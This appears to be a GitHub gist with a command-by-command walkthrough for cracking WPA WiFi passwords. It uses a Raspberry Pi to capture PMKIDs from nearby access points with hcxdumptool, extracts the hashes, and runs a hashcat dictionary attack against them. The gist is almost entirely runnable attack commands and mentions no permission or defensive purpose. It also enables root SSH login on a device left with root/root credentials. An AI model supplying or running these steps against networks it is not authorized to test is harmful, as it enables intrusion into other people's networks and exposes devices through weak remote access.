Created
January 12, 2019 01:18
-
-
Save helloingob/e4d4ca919db6789c6de533411dd6613d to your computer and use it in GitHub Desktop.
How to use hcxdumptool run by archlinux on a raspberry pi
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Inspired by https://thehackernews.com/2018/08/how-to-hack-wifi-password.html | |
| Based on https://miloserdov.org/?p=2100 | |
| Hardware: | |
| - TP-Link TL-WN722N + TP-Link TL-ANT2408CL | |
| - Raspberry Pi 3 | |
| 1.) Get Archlinux für Raspberry | |
| RaspArch Build 181117 (http://raspex.exton.se/?p=983) | |
| Download (https://sourceforge.net/projects/rasparch/files/latest/download) | |
| 2.) Flash OS and boot Raspberry | |
| 3.) *OPTIONAL* Add remote root login | |
| login via GUI over hdmi -> root/root | |
| 3.1) Enable root login over ssh | |
| nano /etc/ssh/sshd_config | |
| PermitRootLogin yes | |
| service sshd restart | |
| 4.) Update Archlinux | |
| sudo pacman -Syy | |
| sudo pacman -Su | |
| 5.) Clone Repositories | |
| git clone https://github.com/ZerBea/hcxdumptool.git | |
| git clone https://github.com/ZerBea/hcxtools.git | |
| 6.) Compile both | |
| make | |
| sudo make install | |
| 7.) Do network scan | |
| sudo hcxdumptool -o test.pcapng -i wlan1 --enable_status 15 | |
| 8.) Extract PMKID | |
| hcxpcaptool -z test.16800 test.pcapng | |
| 9.) Download Hashcat Binaries (>=v5.1.0) | |
| https://hashcat.net/hashcat/ | |
| 10.) Try Dictonary Attack on test.16800 | |
| hashcat64.exe -m 16800 -a 0 -w 3 -o "cracked.txt" C:\test.16800 C:\wordlist\ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment